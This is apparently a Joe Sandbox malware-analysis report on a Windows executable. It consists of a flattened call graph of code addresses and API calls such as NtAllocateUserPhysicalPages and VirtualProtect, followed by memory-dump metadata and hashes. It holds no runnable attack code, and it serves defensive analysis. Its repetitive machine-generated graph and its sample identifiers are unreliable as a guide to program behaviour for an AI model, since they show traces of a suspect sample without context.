7ff71eb1391e 3242->3243 3244 7ff71eb114a9 2 API calls 3243->3244 3263 7ff71eb13b21 3243->3263 3245 7ff71eb13967 3244->3245 3246 7ff71eb13b28 3245->3246 3579 7ff71eb114b8 3245->3579 3798 7ff71eb115c6 3246->3798 3249 7ff71eb13a87 memset 3633 7ff71eb1148b 3249->3633 3252 7ff71eb114b8 2 API calls 3253 7ff71eb1398f 3252->3253 3253->3249 3253->3252 3628 7ff71eb115d5 3253->3628 3257 7ff71eb114b8 2 API calls 3258 7ff71eb13b07 3257->3258 3258->3246 3259 7ff71eb13b0b 3258->3259 3741 7ff71eb1147c 3259->3741 3262 7ff71eb1145e 2 API calls 3262->3263 3263->2647 3268 7ff71eb182d0 3264->3268 3266 7ff71eb113b8 3267 7ff71eb113c6 NtAllocateUserPhysicalPages 3266->3267 3267->2703 3269 7ff71eb182ee 3268->3269 3272 7ff71eb1831b 3268->3272 3269->3266 3270 7ff71eb183c3 3271 7ff71eb183df malloc 3270->3271 3273 7ff71eb18400 3271->3273 3272->3269 3272->3270 3273->3269 3275 7ff71eb1266f memset 3274->3275 3275->2849 3340 7ff71eb1155d 3276->3340 3278 7ff71eb127f4 3279 7ff71eb114c7 2 API calls 3278->3279 3282 7ff71eb12816 3279->3282 3281 7ff71eb12785 wcsncmp 3361 7ff71eb114e5 3281->3361 3284 7ff71eb11503 2 API calls 3282->3284 3285 7ff71eb1283d 3284->3285 3287 7ff71eb12847 memset 3285->3287 3286 7ff71eb12d27 3289 7ff71eb12877 3287->3289 3288 7ff71eb128bc wcscpy wcscat wcslen 3290 7ff71eb1291a 3288->3290 3291 7ff71eb128ee wcslen 3288->3291 3289->3288 3292 7ff71eb12967 wcslen 3290->3292 3295 7ff71eb12985 3290->3295 3291->3290 3292->3295 3293 7ff71eb129d9 wcslen 3294 7ff71eb114a9 2 API calls 3293->3294 3296 7ff71eb12a73 3294->3296 3295->3286 3295->3293 3297 7ff71eb114a9 2 API calls 3296->3297 3298 7ff71eb12bd2 3297->3298 3404 7ff71eb114f4 3298->3404 3301 7ff71eb114c7 2 API calls 3302 7ff71eb12c99 3301->3302 3303 7ff71eb114c7 2 API calls 3302->3303 3304 7ff71eb12cb1 3303->3304 3305 7ff71eb1145e 2 API calls 3304->3305 3306 7ff71eb12cbb 3305->3306 3307 7ff71eb1145e 2 API calls 3306->3307 3308 7ff71eb12cc5 3307->3308 3308->2846 3310 7ff71eb11394 2 API calls 3309->3310 3311 7ff71eb11521 3310->3311 3312 7ff71eb11394 2 API calls 3311->3312 3313 7ff71eb11530 3312->3313 3314 7ff71eb11394 2 API calls 3313->3314 3315 7ff71eb1153f 3314->3315 3316 7ff71eb11394 2 API calls 3315->3316 3317 7ff71eb1154e 3316->3317 3318 7ff71eb11394 2 API calls 3317->3318 3319 7ff71eb1155d 3318->3319 3320 7ff71eb11394 2 API calls 3319->3320 3321 7ff71eb1156c 3320->3321 3322 7ff71eb11394 2 API calls 3321->3322 3323 7ff71eb1157b 3322->3323 3324 7ff71eb11394 2 API calls 3323->3324 3325 7ff71eb1158a 3324->3325 3326 7ff71eb11394 2 API calls 3325->3326 3327 7ff71eb11599 3326->3327 3328 7ff71eb11394 2 API calls 3327->3328 3329 7ff71eb115a8 3328->3329 3330 7ff71eb11394 2 API calls 3329->3330 3331 7ff71eb115b7 3330->3331 3332 7ff71eb11394 2 API calls 3331->3332 3333 7ff71eb115c6 3332->3333 3334 7ff71eb11394 2 API calls 3333->3334 3335 7ff71eb115d5 3334->3335 3336 7ff71eb115e4 3335->3336 3337 7ff71eb11394 2 API calls 3335->3337 3338 7ff71eb11394 2 API calls 3336->3338 3337->3336 3339 7ff71eb115f3 3338->3339 3339->2848 3341 7ff71eb11394 2 API calls 3340->3341 3342 7ff71eb1156c 3341->3342 3343 7ff71eb11394 2 API calls 3342->3343 3344 7ff71eb1157b 3343->3344 3345 7ff71eb11394 2 API calls 3344->3345 3346 7ff71eb1158a 3345->3346 3347 7ff71eb11394 2 API calls 3346->3347 3348 7ff71eb11599 3347->3348 3349 7ff71eb11394 2 API calls 3348->3349 3350 7ff71eb115a8 3349->3350 3351 7ff71eb11394 2 API calls 3350->3351 3352 7ff71eb115b7 3351->3352 3353 7ff71eb11394 2 API calls 3352->3353 3354 7ff71eb115c6 3353->3354 3355 7ff71eb11394 2 API calls 3354->3355 3356 7ff71eb115d5 3355->3356 3357 7ff71eb115e4 3356->3357 3358 7ff71eb11394 2 API calls 3356->3358 3359 7ff71eb11394 2 API calls 3357->3359 3358->3357 3360 7ff71eb115f3 3359->3360 3360->3278 3360->3281 3360->3286 3362 7ff71eb11394 2 API calls 3361->3362 3363 7ff71eb114ef 3362->3363 3364 7ff71eb114f4 3363->3364 3365 7ff71eb11394 2 API calls 3363->3365 3366 7ff71eb11394 2 API calls 3364->3366 3365->3364 3367 7ff71eb114fe 3366->3367 3368 7ff71eb11503 3367->3368 3369 7ff71eb11394 2 API calls 3367->3369 3370 7ff71eb11394 2 API calls 3368->3370 3369->3368 3371 7ff71eb1150d 3370->3371 3372 7ff71eb11394 2 API calls 3371->3372 3373 7ff71eb11512 3372->3373 3374 7ff71eb11394 2 API calls 3373->3374 3375 7ff71eb11521 3374->3375 3376 7ff71eb11394 2 API calls 3375->3376 3377 7ff71eb11530 3376->3377 3378 7ff71eb11394 2 API calls 3377->3378 3379 7ff71eb1153f 3378->3379 3380 7ff71eb11394 2 API calls 3379->3380 3381 7ff71eb1154e 3380->3381 3382 7ff71eb11394 2 API calls 3381->3382 3383 7ff71eb1155d 3382->3383 3384 7ff71eb11394 2 API calls 3383->3384 3385 7ff71eb1156c 3384->3385 3386 7ff71eb11394 2 API calls 3385->3386 3387 7ff71eb1157b 3386->3387 3388 7ff71eb11394 2 API calls 3387->3388 3389 7ff71eb1158a 3388->3389 3390 7ff71eb11394 2 API calls 3389->3390 3391 7ff71eb11599 3390->3391 3392 7ff71eb11394 2 API calls 3391->3392 3393 7ff71eb115a8 3392->3393 3394 7ff71eb11394 2 API calls 3393->3394 3395 7ff71eb115b7 3394->3395 3396 7ff71eb11394 2 API calls 3395->3396 3397 7ff71eb115c6 3396->3397 3398 7ff71eb11394 2 API calls 3397->3398 3399 7ff71eb115d5 3398->3399 3400 7ff71eb115e4 3399->3400 3401 7ff71eb11394 2 API calls 3399->3401 3402 7ff71eb11394 2 API calls 3400->3402 3401->3400 3403 7ff71eb115f3 3402->3403 3403->3278 3405 7ff71eb11394 2 API calls 3404->3405 3406 7ff71eb114fe 3405->3406 3407 7ff71eb11503 3406->3407 3408 7ff71eb11394 2 API calls 3406->3408 3409 7ff71eb11394 2 API calls 3407->3409 3408->3407 3410 7ff71eb1150d 3409->3410 3411 7ff71eb11394 2 API calls 3410->3411 3412 7ff71eb11512 3411->3412 3413 7ff71eb11394 2 API calls 3412->3413 3414 7ff71eb11521 3413->3414 3415 7ff71eb11394 2 API calls 3414->3415 3416 7ff71eb11530 3415->3416 3417 7ff71eb11394 2 API calls 3416->3417 3418 7ff71eb1153f 3417->3418 3419 7ff71eb11394 2 API calls 3418->3419 3420 7ff71eb1154e 3419->3420 3421 7ff71eb11394 2 API calls 3420->3421 3422 7ff71eb1155d 3421->3422 3423 7ff71eb11394 2 API calls 3422->3423 3424 7ff71eb1156c 3423->3424 3425 7ff71eb11394 2 API calls 3424->3425 3426 7ff71eb1157b 3425->3426 3427 7ff71eb11394 2 API calls 3426->3427 3428 7ff71eb1158a 3427->3428 3429 7ff71eb11394 2 API calls 3428->3429 3430 7ff71eb11599 3429->3430 3431 7ff71eb11394 2 API calls 3430->3431 3432 7ff71eb115a8 3431->3432 3433 7ff71eb11394 2 API calls 3432->3433 3434 7ff71eb115b7 3433->3434 3435 7ff71eb11394 2 API calls 3434->3435 3436 7ff71eb115c6 3435->3436 3437 7ff71eb11394 2 API calls 3436->3437 3438 7ff71eb115d5 3437->3438 3439 7ff71eb115e4 3438->3439 3440 7ff71eb11394 2 API calls 3438->3440 3441 7ff71eb11394 2 API calls 3439->3441 3440->3439 3442 7ff71eb115f3 3441->3442 3442->3301 3444 7ff71eb11394 2 API calls 3443->3444 3445 7ff71eb11431 3444->3445 3446 7ff71eb11394 2 API calls 3445->3446 3447 7ff71eb11440 3446->3447 3448 7ff71eb11394 2 API calls 3447->3448 3449 7ff71eb1144f 3448->3449 3450 7ff71eb11394 2 API calls 3449->3450 3451 7ff71eb1145e 3450->3451 3452 7ff71eb11394 2 API calls 3451->3452 3453 7ff71eb1146d 3452->3453 3454 7ff71eb11394 2 API calls 3453->3454 3455 7ff71eb1147c 3454->3455 3456 7ff71eb11394 2 API calls 3455->3456 3457 7ff71eb1148b 3456->3457 3458 7ff71eb11394 2 API calls 3457->3458 3459 7ff71eb1149a 3458->3459 3460 7ff71eb11394 2 API calls 3459->3460 3461 7ff71eb114a9 3460->3461 3462 7ff71eb11394 2 API calls 3461->3462 3463 7ff71eb114b8 3462->3463 3464 7ff71eb11394 2 API calls 3463->3464 3465 7ff71eb114c7 3464->3465 3466 7ff71eb11394 2 API calls 3465->3466 3467 7ff71eb114d6 3466->3467 3468 7ff71eb114e5 3467->3468 3469 7ff71eb11394 2 API calls 3467->3469 3470 7ff71eb11394 2 API calls 3468->3470 3469->3468 3471 7ff71eb114ef 3470->3471 3472 7ff71eb114f4 3471->3472 3473 7ff71eb11394 2 API calls 3471->3473 3474 7ff71eb11394 2 API calls 3472->3474 3473->3472 3475 7ff71eb114fe 3474->3475 3476 7ff71eb11503 3475->3476 3477 7ff71eb11394 2 API calls 3475->3477 3478 7ff71eb11394 2 API calls 3476->3478 3477->3476 3479 7ff71eb1150d 3478->3479 3480 7ff71eb11394 2 API calls 3479->3480 3481 7ff71eb11512 3480->3481 3482 7ff71eb11394 2 API calls 3481->3482 3483 7ff71eb11521 3482->3483 3484 7ff71eb11394 2 API calls 3483->3484 3485 7ff71eb11530 3484->3485 3486 7ff71eb11394 2 API calls 3485->3486 3487 7ff71eb1153f 3486->3487 3488 7ff71eb11394 2 API calls 3487->3488 3489 7ff71eb1154e 3488->3489 3490 7ff71eb11394 2 API calls 3489->3490 3491 7ff71eb1155d 3490->3491 3492 7ff71eb11394 2 API calls 3491->3492 3493 7ff71eb1156c 3492->3493 3494 7ff71eb11394 2 API calls 3493->3494 3495 7ff71eb1157b 3494->3495 3496 7ff71eb11394 2 API calls 3495->3496 3497 7ff71eb1158a 3496->3497 3498 7ff71eb11394 2 API calls 3497->3498 3499 7ff71eb11599 3498->3499 3500 7ff71eb11394 2 API calls 3499->3500 3501 7ff71eb115a8 3500->3501 3502 7ff71eb11394 2 API calls 3501->3502 3503 7ff71eb115b7 3502->3503 3504 7ff71eb11394 2 API calls 3503->3504 3505 7ff71eb115c6 3504->3505 3506 7ff71eb11394 2 API calls 3505->3506 3507 7ff71eb115d5 3506->3507 3508 7ff71eb115e4 3507->3508 3509 7ff71eb11394 2 API calls 3507->3509 3510 7ff71eb11394 2 API calls 3508->3510 3509->3508 3511 7ff71eb115f3 3510->3511 3511->3179 3513 7ff71eb11394 2 API calls 3512->3513 3514 7ff71eb11440 3513->3514 3515 7ff71eb11394 2 API calls 3514->3515 3516 7ff71eb1144f 3515->3516 3517 7ff71eb11394 2 API calls 3516->3517 3518 7ff71eb1145e 3517->3518 3519 7ff71eb11394 2 API calls 3518->3519 3520 7ff71eb1146d 3519->3520 3521 7ff71eb11394 2 API calls 3520->3521 3522 7ff71eb1147c 3521->3522 3523 7ff71eb11394 2 API calls 3522->3523 3524 7ff71eb1148b 3523->3524 3525 7ff71eb11394 2 API calls 3524->3525 3526 7ff71eb1149a 3525->3526 3527 7ff71eb11394 2 API calls 3526->3527 3528 7ff71eb114a9 3527->3528 3529 7ff71eb11394 2 API calls 3528->3529 3530 7ff71eb114b8 3529->3530 3531 7ff71eb11394 2 API calls 3530->3531 3532 7ff71eb114c7 3531->3532 3533 7ff71eb11394 2 API calls 3532->3533 3534 7ff71eb114d6 3533->3534 3535 7ff71eb114e5 3534->3535 3536 7ff71eb11394 2 API calls 3534->3536 3537 7ff71eb11394 2 API calls 3535->3537 3536->3535 3538 7ff71eb114ef 3537->3538 3539 7ff71eb114f4 3538->3539 3540 7ff71eb11394 2 API calls 3538->3540 3541 7ff71eb11394 2 API calls 3539->3541 3540->3539 3542 7ff71eb114fe 3541->3542 3543 7ff71eb11503 3542->3543 3544 7ff71eb11394 2 API calls 3542->3544 3545 7ff71eb11394 2 API calls 3543->3545 3544->3543 3546 7ff71eb1150d 3545->3546 3547 7ff71eb11394 2 API calls 3546->3547 3548 7ff71eb11512 3547->3548 3549 7ff71eb11394 2 API calls 3548->3549 3550 7ff71eb11521 3549->3550 3551 7ff71eb11394 2 API calls 3550->3551 3552 7ff71eb11530 3551->3552 3553 7ff71eb11394 2 API calls 3552->3553 3554 7ff71eb1153f 3553->3554 3555 7ff71eb11394 2 API calls 3554->3555 3556 7ff71eb1154e 3555->3556 3557 7ff71eb11394 2 API calls 3556->3557 3558 7ff71eb1155d 3557->3558 3559 7ff71eb11394 2 API calls 3558->3559 3560 7ff71eb1156c 3559->3560 3561 7ff71eb11394 2 API calls 3560->3561 3562 7ff71eb1157b 3561->3562 3563 7ff71eb11394 2 API calls 3562->3563 3564 7ff71eb1158a 3563->3564 3565 7ff71eb11394 2 API calls 3564->3565 3566 7ff71eb11599 3565->3566 3567 7ff71eb11394 2 API calls 3566->3567 3568 7ff71eb115a8 3567->3568 3569 7ff71eb11394 2 API calls 3568->3569 3570 7ff71eb115b7 3569->3570 3571 7ff71eb11394 2 API calls 3570->3571 3572 7ff71eb115c6 3571->3572 3573 7ff71eb11394 2 API calls 3572->3573 3574 7ff71eb115d5 3573->3574 3575 7ff71eb115e4 3574->3575 3576 7ff71eb11394 2 API calls 3574->3576 3577 7ff71eb11394 2 API calls 3575->3577 3576->3575 3578 7ff71eb115f3 3577->3578 3578->3187 3580 7ff71eb11394 2 API calls 3579->3580 3581 7ff71eb114c7 3580->3581 3582 7ff71eb11394 2 API calls 3581->3582 3583 7ff71eb114d6 3582->3583 3584 7ff71eb114e5 3583->3584 3585 7ff71eb11394 2 API calls 3583->3585 3586 7ff71eb11394 2 API calls 3584->3586 3585->3584 3587 7ff71eb114ef 3586->3587 3588 7ff71eb114f4 3587->3588 3589 7ff71eb11394 2 API calls 3587->3589 3590 7ff71eb11394 2 API calls 3588->3590 3589->3588 3591 7ff71eb114fe 3590->3591 3592 7ff71eb11503 3591->3592 3593 7ff71eb11394 2 API calls 3591->3593 3594 7ff71eb11394 2 API calls 3592->3594 3593->3592 3595 7ff71eb1150d 3594->3595 3596 7ff71eb11394 2 API calls 3595->3596 3597 7ff71eb11512 3596->3597 3598 7ff71eb11394 2 API calls 3597->3598 3599 7ff71eb11521 3598->3599 3600 7ff71eb11394 2 API calls 3599->3600 3601 7ff71eb11530 3600->3601 3602 7ff71eb11394 2 API calls 3601->3602 3603 7ff71eb1153f 3602->3603 3604 7ff71eb11394 2 API calls 3603->3604 3605 7ff71eb1154e 3604->3605 3606 7ff71eb11394 2 API calls 3605->3606 3607 7ff71eb1155d 3606->3607 3608 7ff71eb11394 2 API calls 3607->3608 3609 7ff71eb1156c 3608->3609 3610 7ff71eb11394 2 API calls 3609->3610 3611 7ff71eb1157b 3610->3611 3612 7ff71eb11394 2 API calls 3611->3612 3613 7ff71eb1158a 3612->3613 3614 7ff71eb11394 2 API calls 3613->3614 3615 7ff71eb11599 3614->3615 3616 7ff71eb11394 2 API calls 3615->3616 3617 7ff71eb115a8 3616->3617 3618 7ff71eb11394 2 API calls 3617->3618 3619 7ff71eb115b7 3618->3619 3620 7ff71eb11394 2 API calls 3619->3620 3621 7ff71eb115c6 3620->3621 3622 7ff71eb11394 2 API calls 3621->3622 3623 7ff71eb115d5 3622->3623 3624 7ff71eb115e4 3623->3624 3625 7ff71eb11394 2 API calls 3623->3625 3626 7ff71eb11394 2 API calls 3624->3626 3625->3624 3627 7ff71eb115f3 3626->3627 3627->3253 3629 7ff71eb115e4 3628->3629 3630 7ff71eb11394 2 API calls 3628->3630 3631 7ff71eb11394 2 API calls 3629->3631 3630->3629 3632 7ff71eb115f3 3631->3632 3632->3253 3634 7ff71eb11394 2 API calls 3633->3634 3635 7ff71eb1149a 3634->3635 3636 7ff71eb11394 2 API calls 3635->3636 3637 7ff71eb114a9 3636->3637 3638 7ff71eb11394 2 API calls 3637->3638 3639 7ff71eb114b8 3638->3639 3640 7ff71eb11394 2 API calls 3639->3640 3641 7ff71eb114c7 3640->3641 3642 7ff71eb11394 2 API calls 3641->3642 3643 7ff71eb114d6 3642->3643 3644 7ff71eb114e5 3643->3644 3645 7ff71eb11394 2 API calls 3643->3645 3646 7ff71eb11394 2 API calls 3644->3646 3645->3644 3647 7ff71eb114ef 3646->3647 3648 7ff71eb114f4 3647->3648 3649 7ff71eb11394 2 API calls 3647->3649 3650 7ff71eb11394 2 API calls 3648->3650 3649->3648 3651 7ff71eb114fe 3650->3651 3652 7ff71eb11503 3651->3652 3653 7ff71eb11394 2 API calls 3651->3653 3654 7ff71eb11394 2 API calls 3652->3654 3653->3652 3655 7ff71eb1150d 3654->3655 3656 7ff71eb11394 2 API calls 3655->3656 3657 7ff71eb11512 3656->3657 3658 7ff71eb11394 2 API calls 3657->3658 3659 7ff71eb11521 3658->3659 3660 7ff71eb11394 2 API calls 3659->3660 3661 7ff71eb11530 3660->3661 3662 7ff71eb11394 2 API calls 3661->3662 3663 7ff71eb1153f 3662->3663 3664 7ff71eb11394 2 API calls 3663->3664 3665 7ff71eb1154e 3664->3665 3666 7ff71eb11394 2 API calls 3665->3666 3667 7ff71eb1155d 3666->3667 3668 7ff71eb11394 2 API calls 3667->3668 3669 7ff71eb1156c 3668->3669 3670 7ff71eb11394 2 API calls 3669->3670 3671 7ff71eb1157b 3670->3671 3672 7ff71eb11394 2 API calls 3671->3672 3673 7ff71eb1158a 3672->3673 3674 7ff71eb11394 2 API calls 3673->3674 3675 7ff71eb11599 3674->3675 3676 7ff71eb11394 2 API calls 3675->3676 3677 7ff71eb115a8 3676->3677 3678 7ff71eb11394 2 API calls 3677->3678 3679 7ff71eb115b7 3678->3679 3680 7ff71eb11394 2 API calls 3679->3680 3681 7ff71eb115c6 3680->3681 3682 7ff71eb11394 2 API calls 3681->3682 3683 7ff71eb115d5 3682->3683 3684 7ff71eb115e4 3683->3684 3685 7ff71eb11394 2 API calls 3683->3685 3686 7ff71eb11394 2 API calls 3684->3686 3685->3684 3687 7ff71eb115f3 3686->3687 3687->3246 3688 7ff71eb1149a 3687->3688 3689 7ff71eb11394 2 API calls 3688->3689 3690 7ff71eb114a9 3689->3690 3691 7ff71eb11394 2 API calls 3690->3691 3692 7ff71eb114b8 3691->3692 3693 7ff71eb11394 2 API calls 3692->3693 3694 7ff71eb114c7 3693->3694 3695 7ff71eb11394 2 API calls 3694->3695 3696 7ff71eb114d6 3695->3696 3697 7ff71eb114e5 3696->3697 3698 7ff71eb11394 2 API calls 3696->3698 3699 7ff71eb11394 2 API calls 3697->3699 3698->3697 3700 7ff71eb114ef 3699->3700 3701 7ff71eb114f4 3700->3701 3702 7ff71eb11394 2 API calls 3700->3702 3703 7ff71eb11394 2 API calls 3701->3703 3702->3701 3704 7ff71eb114fe 3703->3704 3705 7ff71eb11503 3704->3705 3706 7ff71eb11394 2 API calls 3704->3706 3707 7ff71eb11394 2 API calls 3705->3707 3706->3705 3708 7ff71eb1150d 3707->3708 3709 7ff71eb11394 2 API calls 3708->3709 3710 7ff71eb11512 3709->3710 3711 7ff71eb11394 2 API calls 3710->3711 3712 7ff71eb11521 3711->3712 3713 7ff71eb11394 2 API calls 3712->3713 3714 7ff71eb11530 3713->3714 3715 7ff71eb11394 2 API calls 3714->3715 3716 7ff71eb1153f 3715->3716 3717 7ff71eb11394 2 API calls 3716->3717 3718 7ff71eb1154e 3717->3718 3719 7ff71eb11394 2 API calls 3718->3719 3720 7ff71eb1155d 3719->3720 3721 7ff71eb11394 2 API calls 3720->3721 3722 7ff71eb1156c 3721->3722 3723 7ff71eb11394 2 API calls 3722->3723 3724 7ff71eb1157b 3723->3724 3725 7ff71eb11394 2 API calls 3724->3725 3726 7ff71eb1158a 3725->3726 3727 7ff71eb11394 2 API calls 3726->3727 3728 7ff71eb11599 3727->3728 3729 7ff71eb11394 2 API calls 3728->3729 3730 7ff71eb115a8 3729->3730 3731 7ff71eb11394 2 API calls 3730->3731 3732 7ff71eb115b7 3731->3732 3733 7ff71eb11394 2 API calls 3732->3733 3734 7ff71eb115c6 3733->3734 3735 7ff71eb11394 2 API calls 3734->3735 3736 7ff71eb115d5 3735->3736 3737 7ff71eb115e4 3736->3737 3738 7ff71eb11394 2 API calls 3736->3738 3739 7ff71eb11394 2 API calls 3737->3739 3738->3737 3740 7ff71eb115f3 3739->3740 3740->3246 3740->3257 3742 7ff71eb11394 2 API calls 3741->3742 3743 7ff71eb1148b 3742->3743 3744 7ff71eb11394 2 API calls 3743->3744 3745 7ff71eb1149a 3744->3745 3746 7ff71eb11394 2 API calls 3745->3746 3747 7ff71eb114a9 3746->3747 3748 7ff71eb11394 2 API calls 3747->3748 3749 7ff71eb114b8 3748->3749 3750 7ff71eb11394 2 API calls 3749->3750 3751 7ff71eb114c7 3750->3751 3752 7ff71eb11394 2 API calls 3751->3752 3753 7ff71eb114d6 3752->3753 3754 7ff71eb114e5 3753->3754 3755 7ff71eb11394 2 API calls 3753->3755 3756 7ff71eb11394 2 API calls 3754->3756 3755->3754 3757 7ff71eb114ef 3756->3757 3758 7ff71eb114f4 3757->3758 3759 7ff71eb11394 2 API calls 3757->3759 3760 7ff71eb11394 2 API calls 3758->3760 3759->3758 3761 7ff71eb114fe 3760->3761 3762 7ff71eb11503 3761->3762 3763 7ff71eb11394 2 API calls 3761->3763 3764 7ff71eb11394 2 API calls 3762->3764 3763->3762 3765 7ff71eb1150d 3764->3765 3766 7ff71eb11394 2 API calls 3765->3766 3767 7ff71eb11512 3766->3767 3768 7ff71eb11394 2 API calls 3767->3768 3769 7ff71eb11521 3768->3769 3770 7ff71eb11394 2 API calls 3769->3770 3771 7ff71eb11530 3770->3771 3772 7ff71eb11394 2 API calls 3771->3772 3773 7ff71eb1153f 3772->3773 3774 7ff71eb11394 2 API calls 3773->3774 3775 7ff71eb1154e 3774->3775 3776 7ff71eb11394 2 API calls 3775->3776 3777 7ff71eb1155d 3776->3777 3778 7ff71eb11394 2 API calls 3777->3778 3779 7ff71eb1156c 3778->3779 3780 7ff71eb11394 2 API calls 3779->3780 3781 7ff71eb1157b 3780->3781 3782 7ff71eb11394 2 API calls 3781->3782 3783 7ff71eb1158a 3782->3783 3784 7ff71eb11394 2 API calls 3783->3784 3785 7ff71eb11599 3784->3785 3786 7ff71eb11394 2 API calls 3785->3786 3787 7ff71eb115a8 3786->3787 3788 7ff71eb11394 2 API calls 3787->3788 3789 7ff71eb115b7 3788->3789 3790 7ff71eb11394 2 API calls 3789->3790 3791 7ff71eb115c6 3790->3791 3792 7ff71eb11394 2 API calls 3791->3792 3793 7ff71eb115d5 3792->3793 3794 7ff71eb115e4 3793->3794 3795 7ff71eb11394 2 API calls 3793->3795 3796 7ff71eb11394 2 API calls 3794->3796 3795->3794 3797 7ff71eb115f3 3796->3797 3797->3262 3799 7ff71eb11394 2 API calls 3798->3799 3800 7ff71eb115d5 3799->3800 3801 7ff71eb115e4 3800->3801 3802 7ff71eb11394 2 API calls 3800->3802 3803 7ff71eb11394 2 API calls 3801->3803 3802->3801 3804 7ff71eb115f3 3803->3804 3804->3263 3829 7ff71eb11000 3830 7ff71eb1108b __set_app_type 3829->3830 3831 7ff71eb11040 3829->3831 3832 7ff71eb110b6 3830->3832 3831->3830 3833 7ff71eb110e5 3832->3833 3835 7ff71eb11e00 3832->3835 3836 7ff71eb18860 __setusermatherr 3835->3836 3837 7ff71eb11800 3838 7ff71eb11812 3837->3838 3839 7ff71eb11835 fprintf 3838->3839 3864 7ff71eb12320 strlen 3865 7ff71eb12337 3864->3865 3872 7ff71eb11ac3 3873 7ff71eb1199e 3872->3873 3874 7ff71eb11b36 3873->3874 3876 7ff71eb11a0f 3873->3876 3877 7ff71eb119e9 VirtualProtect 3873->3877 3875 7ff71eb11ba0 4 API calls 3874->3875 3875->3876 3877->3873 3840 7ff71eb12104 3841 7ff71eb12111 EnterCriticalSection 3840->3841 3843 7ff71eb12218 3840->3843 3844 7ff71eb1220b LeaveCriticalSection 3841->3844 3848 7ff71eb1212e 3841->3848 3842 7ff71eb12272 3843->3842 3845 7ff71eb12241 DeleteCriticalSection 3843->3845 3847 7ff71eb12230 free 3843->3847 3844->3843 3845->3842 3846 7ff71eb1214d TlsGetValue GetLastError 3846->3848 3847->3845 3847->3847 3848->3844 3848->3846 3815 7ff71eb11e65 3816 7ff71eb11e67 signal 3815->3816 3817 7ff71eb11e7c 3816->3817 3819 7ff71eb11e99 3816->3819 3818 7ff71eb11e82 signal 3817->3818 3817->3819 3818->3819 3878 7ff71eb11f47 3879 7ff71eb11e67 signal 3878->3879 3880 7ff71eb11e99 3878->3880 3879->3880 3881 7ff71eb11e7c 3879->3881 3881->3880 3882 7ff71eb11e82 signal 3881->3882 3882->3880 3820 7ff71eb1216f 3821 7ff71eb12178 InitializeCriticalSection 3820->3821 3822 7ff71eb12185 3820->3822 3821->3822 3823 7ff71eb11a70 3826 7ff71eb1199e 3823->3826 3824 7ff71eb119e9 VirtualProtect 3824->3823 3824->3826 3825 7ff71eb11a0f 3826->3823 3826->3824 3826->3825 3827 7ff71eb11b36 3826->3827 3828 7ff71eb11ba0 4 API calls 3827->3828 3828->3825 3849 7ff71eb11e10 3850 7ff71eb11e2f 3849->3850 3851 7ff71eb11e55 3850->3851 3852 7ff71eb11ecc 3850->3852 3853 7ff71eb11eb5 3850->3853 3851->3853 3857 7ff71eb11f12 signal 3851->3857 3852->3853 3854 7ff71eb11ed3 signal 3852->3854 3854->3853 3855 7ff71eb11ee4 3854->3855 3855->3853 3856 7ff71eb11eea signal 3855->3856 3856->3853 3857->3853 3883 7ff71eb11fd0 3884 7ff71eb11fe4 3883->3884 3886 7ff71eb12033 3883->3886 3885 7ff71eb11ffd EnterCriticalSection LeaveCriticalSection 3884->3885 3884->3886 3885->3886 3887 7ff71eb12050 3888 7ff71eb1205e EnterCriticalSection 3887->3888 3889 7ff71eb120cf 3887->3889 3890 7ff71eb120c2 LeaveCriticalSection 3888->3890 3891 7ff71eb12079 3888->3891 3890->3889 3891->3890 3892 7ff71eb120bd free 3891->3892 3892->3890 3866 7ff71eb11ab3 3867 7ff71eb1199e 3866->3867 3867->3866 3868 7ff71eb11b36 3867->3868 3870 7ff71eb11a0f 3867->3870 3871 7ff71eb119e9 VirtualProtect 3867->3871 3869 7ff71eb11ba0 4 API calls 3868->3869 3869->3870 3871->3867 3805 7ff71eb11394 3806 7ff71eb182d0 malloc 3805->3806 3807 7ff71eb113b8 3806->3807 3808 7ff71eb113c6 NtAllocateUserPhysicalPages 3807->3808

                                                        Executed Functions

                                                        Function 00007FF71EB11160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163387987.00007FF71EB1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163409027.00007FF71EB1C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163809784.00007FF71ED97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163834082.00007FF71ED99000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163863860.00007FF71ED9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff71eb10000_WWhhc3A0rs.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 19a9fb927d1e6cd504815deac6584628b56f7f6ee1b9ed6be7109d8e51d185c5
                                                        • Instruction ID: 5ac715a068615ff3c2e8b1631be26b73b7433f8ec37b8e254b2f2db679ef80f5
                                                        • Opcode Fuzzy Hash: 19a9fb927d1e6cd504815deac6584628b56f7f6ee1b9ed6be7109d8e51d185c5
                                                        • Instruction Fuzzy Hash: 7A513835A09E4680FA31BB25F955BBDE3A2BF447B0F845035CA4D433A1DE2CB8598360
                                                        Function 00007FF71EB11394 Relevance: 1.5, APIs: 1, Instructions: 24memorynativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • NtAllocateUserPhysicalPages.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71EB11156), ref: 00007FF71EB113F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2163347669.00007FF71EB11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71EB10000, based on PE: true
                                                        • Associated: 00000000.00000002.2163329002.00007FF71EB10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2163366945.00007FF71EB19000.00000002.00000001.01000000.00000003.sdmpDownload File
